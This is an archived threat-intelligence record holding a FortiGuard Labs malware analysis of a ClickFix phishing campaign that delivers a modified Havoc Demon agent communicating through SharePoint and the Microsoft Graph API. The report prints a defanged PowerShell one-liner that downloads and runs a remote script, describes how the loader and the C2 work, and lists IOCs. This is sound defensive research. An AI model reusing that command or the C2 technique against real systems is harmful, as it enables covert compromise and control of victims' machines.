{
	"id": "c48579d6-15a9-4760-8487-107c379de9c3",
	"created_at": "2026-04-06T00:21:27.395959Z",
	"updated_at": "2026-04-10T03:24:24.363261Z",
	"deleted_at": null,
	"sha1_hash": "b225cf55d6910cbd911b6aa419fe300ba62d21ed",
	"title": "Havoc: SharePoint with Microsoft Graph API turns into FUD C2 | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6517604,
	"plain_text": "Havoc: SharePoint with Microsoft Graph API turns into FUD C2 | FortiGuard Labs\r\nBy Yurren Wan\r\nPublished: 2025-03-03 · Archived: 2026-04-05 19:01:43 UTC\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Any organization\r\nImpact: Attackers gain control of the infected systems\r\nSeverity level: High\r\nHavoc is a powerful command-and-control (C2) framework. Like other well-known C2 frameworks, such as Cobalt Strike, Sliver, and Winos4.0, Havoc has been used in threat campaigns to gain full control over the target. Additionally, it is open-source and available on GitHub, making it easier for threat actors to modify it to evade detection.\r\nFortiGuard Labs recently discovered a phishing campaign that combines ClickFix and multi-stage malware to deploy a modified Havoc Demon Agent. The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2 communications within trusted, well-known services. Figure 1 shows the attack chain.\r\nFigure 1: Attack flow\r\nInitial Access\r\nThe attack campaign starts with a phishing email containing an HTML file as an attachment, as illustrated in Figure 2. It uses a brief explanation and an urgent tone to prompt the recipient to open the attachment immediately.\r\nhttps://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\r\nPage 1 of 12\r\nFigure 2: The phishing e-mail\r\nThe attachment, \"Documents.html,\" is a ClickFix attack that embeds a fake error message and instructions in HTML to deceive users into copying and pasting a malicious PowerShell command into their terminal or PowerShell, ultimately executing malicious code.\r\nFigure 3: Document.html using ClickFix social engineering tactic\r\nDecoding the base64-encoded string shown in Figure 3 reveals a PowerShell command that downloads and executes a remote PowerShell script.\r\npowershell -w h -c \"iwr 'hxxps://hao771[.]sharepoint.com/_layouts/15/download.aspx?share=EU7smZuKo-pDixZ26BSAaX0BVVcF5VkOc7qEvjsDSAH9OQ'|iex\"\r\npayload_20250112_074319.ps1\r\nThe script file is hosted in SharePoint and controlled by the threat actor. When the script runs, it checks whether the execution environment is a sandbox by verifying the number of domain computers. It then deletes all registry entries under HKCU:\\Software\\Microsoft with names starting with \"zr_\" and adds the specified property as an infection marker, as shown in Figure 4.\r\nFigure 4: PowerShell script for sandbox evasion and infection tagging\r\nNext, the script verifies the existence of pythonw.exe. If it's not found, it downloads the Python interpreter. Otherwise, it directly runs the Python script. Finally, the remote Python script is retrieved and executed in hidden windows to obscure malicious activity, as shown in Figure 5.\r\nFigure 5: PowerShell script for downloading and executing the remote Python script\r\nPython Shellcode Loader - payload_20250107_015913.py\r\nLike the PowerShell script, the Python script is hosted on the same SharePoint. It contains debug information written in Russian and serves as a shellcode loader.\r\nWe executed the script directly with the Python interpreter in the terminal. The log displays \"Выделение памяти\" (memory allocation), \"Запись в память\" (write to memory), \"Выполнение shellcode\" (execution of shellcode), and \"Завершение выполнения скрипта\" (script execution completion) in sequence, indicating successful shellcode execution, as seen in Figure 6.\r\nFigure 6: Python script for shellcode execution\r\nKaynLdr\r\nKaynLdr is a GitHub shellcode loader designed to reflectively load an embedded DLL. It complicates analysis by using API hashing with a modified DJB2 algorithm and leverages resolved ntdll APIs for memory allocation and mapping. The instruction \"call rax\" executes the embedded DLL's entry point, as shown in Figure 7.\r\nFigure 7: Executing the DLL with the KaynLdr shellcode loader\r\nHavoc Demon DLL\r\nHavoc is an open-source post-exploitation command and control framework used in red teaming exercises and attack campaigns to gain complete control over compromised targets.\r\nIn this attack campaign, we observed that the threat actor uses Havoc in conjunction with the Microsoft Graph API to conceal C2 communication within well-known services.\r\nThe modified Havoc Demon DLL still starts with DemonInit and uses the same hash algorithm as KaynLdr to retrieve the necessary APIs and initialize the configuration objects.\r\nFigure 8: DemonMain in the modified Havoc Demon DLL; the retrieved APIs are stored in the structure beginning at address 0xb6\r\nThe second function, \"SharePointC2Init,\" initializes files on the actor's SharePoint site using the Microsoft Graph API.\r\nIt first combines the hardcoded shared secret with the necessary parameters for a POST request. It then sends the request to the /token endpoint of the Microsoft Identity Platform to obtain access tokens for Microsoft Graph APIs.\r\nFigure 9: Access token request with a hardcoded shared secret\r\nNext, it utilizes the obtained token to create two files in SharePoint's default document library by making a PUT request, as shown in Figure 10.\r\nFigure 10: Creating a file in the root folder\r\nThe Havoc AgentID generates the VictimID as a filename, concatenated with the suffix \"pD9-tKout/pD9-tKin\" to indicate their purpose.\r\nTable 1: Two files utilized for SharePoint C2 to control the target.\r\nThe initial packet sent to C2 is a CheckIn request containing data gathered from the DemonMetaData function. In this step, the victim's information, such as Host Name, User Name, Domain Name, IP Address, Process Details, OS Information, whether the user has an elevated account, and the configuration in the Demon DLL, is sent to the C2 server.\r\nAll content is encrypted using the AES-256 algorithm in CTR mode with a randomly generated 256-bit key and a 128-bit IV. Finally, it is combined with the header, as illustrated in Figure 11, before being sent to the C2 server via the TransportSend function.\r\nFigure 11: The contents of the CheckIn request and the Metadata structure in Havoc GitHub\r\nThe TransportSend function has been modified to communicate with the C2 by accessing two files: {VictimID}pD9-tKout and {VictimID}pD9-tKin.\r\nIt updates the request to the \"{VictimID}pD9-tKout\" file and then retrieves the response from the C2 by using the Microsoft Graph API with the GET method to access the contents of the \"{VictimID}pD9-tKin\" file. If the response is successfully retrieved, the content of file \"{VictimID}pD9-tKin\" is immediately erased.\r\nFigure 12: The modified TransportSend function and the function \"FetchInFile\"\r\nNext, the content in the response is compared with the AgentID. If they match, the session.connected flag is set, and it enters the dispatcher routine to await new tasks from the attacker.\r\nIn the dispatcher routine, the agent sends a \"Get Job\" request and parses the response into Command ID, Request ID, and task. Although we only observed DEMON_COMMAND_NO_JOB (Command ID: 0xA) during our analysis, as shown below, we found that the task would be decrypted and executed if a different command ID exists and is not 0xA in the program.\r\nFigure 13: Accessing the contents of the \"{VictimID}pD9-tKin\" file\r\nThe supported commands are the same as those in Havoc GitHub, as shown in Figure 14. They include gathering information about the target, file operations, command and payload execution, token manipulation, and Kerberos attacks.\r\nFigure 14: The primary function for executing the Demon command\r\nConclusion\r\nIn addition to staying alert for phishing emails, guided messages that encourage opening a terminal or PowerShell must be handled with extra caution to prevent inadvertently downloading and executing malicious commands.\r\nIn this article, we uncovered the execution flow and the altered open-source post-exploitation framework used in this attack. Public services once again play a crucial role in the attack campaign, now further integrated with modified Havoc Demon to hide malicious communication within the Microsoft Graph API, making identification and detection even more challenging.\r\nFortinet Protections\r\nThe malware described in this report is detected and blocked by FortiGuard Antivirus as:\r\nHTML/Agent.A5D4!tr\r\nPowerShell/MalwThreat!ebc5FT\r\nPython/Agent.DF60!tr\r\nW64/Havoc.L!tr\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard Antivirus Service. The FortiGuard antivirus engine is part of each of those solutions. As a result, customers who have these products with up-to-date protections are protected.\r\nThe FortiGuard CDR (content disarm and reconstruction) service can disarm the malicious macros within the document.\r\nFortiGuard Labs provides the Backdoor.Havoc.Agent IPS signature to block Havoc C2 network communications.\r\nWe also suggest that organizations take the free Fortinet Certified Fundamentals (FCF) cybersecurity training. The training is designed to help users learn about today's threat landscape and introduces basic cybersecurity concepts and technology.\r\nFortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks malware attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact the Global FortiGuard Incident Response Team.\r\nIOCs\r\nC2\r\nhao771[.]sharepoint.com\r\nFiles\r\n51796effe230d9eca8ec33eb17de9c27e9e96ab52e788e3a9965528be2902330\r\n989f58c86343704f143c0d9e16893fad98843b932740b113e8b2f8376859d2dd\r\nA5210aaa9eb51e866d9c2ef17f55c0526732eacb1a412b910394b6b51246b7da\r\ncc151456cf7df7ff43113e5f82c4ce89434ab40e68cd6fb362e4ae4f70ce65b3\r\nSource: https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2"
	],
	"report_names": [
		"havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434887,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b225cf55d6910cbd911b6aa419fe300ba62d21ed.pdf",
		"text": "https://archive.orkl.eu/b225cf55d6910cbd911b6aa419fe300ba62d21ed.txt",
		"img": "https://archive.orkl.eu/b225cf55d6910cbd911b6aa419fe300ba62d21ed.jpg"
	}
}